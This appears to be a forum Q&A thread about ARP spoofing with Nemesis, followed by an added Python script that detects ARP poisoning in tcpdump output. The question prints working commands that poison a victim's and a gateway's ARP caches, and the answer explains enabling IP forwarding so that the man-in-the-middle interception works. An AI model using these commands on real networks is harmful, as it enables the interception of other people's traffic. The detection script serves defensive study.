
I've been using Nemesis 1.4 to test ARP spoofing on a local victim machine. I've been spoofing both the victim machine and the default gateway to ARP redirect to my machine.

Spoofing victim's source MAC:

sudo nemesis arp -v -r -d eth0 -S [victim IP] -D [default gateway IP] \
                 -h [my system MAC]  -m [gateway MAC] -H [my MAC] -M [gateway MAC]

Spoofing gateway's MAC:

sudo nemesis arp -v -r -d eth0 -S [gateway IP] -D [victim IP] \
                 -h [my system MAC]  -m [victim MAC] -H [my MAC] -M [victim MAC]

Afterwards, a looping Bash script is made and the ARP redirection begins, spoofing every 10 seconds. In tcpdump I can see the ARP replies going out, and it seems to be working. But once on the victim's machine, the internet connection suddenly becomes painfully slow, if it works at all. Is Nemesis not redirecting? If so, what am I doing wrong?

Gilles 'SO- stop being evil'
Dividan84

1 Answer


From reading this article, it appears that Nemesis just poisons the ARP cache of the victim and gateway to cause them to forward packets to your machine (the middle man).

You need to enable IP forwarding (see the previous article or this one for more detail on IP forwarding) on your machine to get the redirected packets forwarded to the correct systems.

HeatfanJohn
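The poisoning described in this thread leaves a recognisable trace on the wire: the gateway's and the victim's IP addresses both start resolving to one and the same MAC, and the replies repeat on a timer. The following is an added example, not part of the original question or answer, that flags both patterns in `tcpdump -e -n arp` output; the sample lines, addresses and the function name `find_arp_anomalies` are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample in `tcpdump -e -n arp` style. MAC ...:99 is the
# hypothetical spoofing host; 192.168.1.1 is the gateway, .50 the victim.
SAMPLE = """\
12:00:00.000001 00:00:5e:00:53:01 > 00:00:5e:00:53:50, ethertype ARP (0x0806), length 42: Reply 192.168.1.1 is-at 00:00:5e:00:53:01, length 28
12:00:01.000001 00:00:5e:00:53:50 > 00:00:5e:00:53:01, ethertype ARP (0x0806), length 42: Reply 192.168.1.50 is-at 00:00:5e:00:53:50, length 28
12:00:10.000001 00:00:5e:00:53:99 > 00:00:5e:00:53:50, ethertype ARP (0x0806), length 42: Reply 192.168.1.1 is-at 00:00:5e:00:53:99, length 28
12:00:10.000002 00:00:5e:00:53:99 > 00:00:5e:00:53:01, ethertype ARP (0x0806), length 42: Reply 192.168.1.50 is-at 00:00:5e:00:53:99, length 28
12:00:20.000001 00:00:5e:00:53:99 > 00:00:5e:00:53:50, ethertype ARP (0x0806), length 42: Reply 192.168.1.1 is-at 00:00:5e:00:53:99, length 28
"""

REPLY = re.compile(
    r"Reply (\d+\.\d+\.\d+\.\d+) is-at ((?:[0-9a-f]{2}:){5}[0-9a-f]{2})", re.I)

def find_arp_anomalies(capture_text):
    """Return (rebinds, multi_ip_macs) observed in ARP replies.

    rebinds: list of (ip, old_mac, new_mac) where an IP's MAC changed.
    multi_ip_macs: {mac: sorted IPs} for MACs answering for more than one IP.
    """
    current = {}                  # ip -> MAC from the most recent reply
    claimed = defaultdict(set)    # mac -> every IP it has answered for
    rebinds = []
    for line in capture_text.splitlines():
        m = REPLY.search(line)
        if not m:
            continue              # not an ARP reply line
        ip, mac = m.group(1), m.group(2).lower()
        old = current.get(ip)
        if old is not None and old != mac:
            rebinds.append((ip, old, mac))
        current[ip] = mac
        claimed[mac].add(ip)
    multi = {mac: sorted(ips) for mac, ips in claimed.items() if len(ips) > 1}
    return rebinds, multi

if __name__ == "__main__":
    rebinds, multi = find_arp_anomalies(SAMPLE)
    for ip, old, new in rebinds:
        print(f"REBIND {ip}: {old} -> {new}")
    for mac, ips in multi.items():
        print(f"MULTI-IP {mac} answers for {', '.join(ips)}")
```

A MAC answering for several IPs can be legitimate (proxy ARP, a host with multiple addresses), so treat a hit as a prompt to compare against the known gateway MAC rather than as proof on its own.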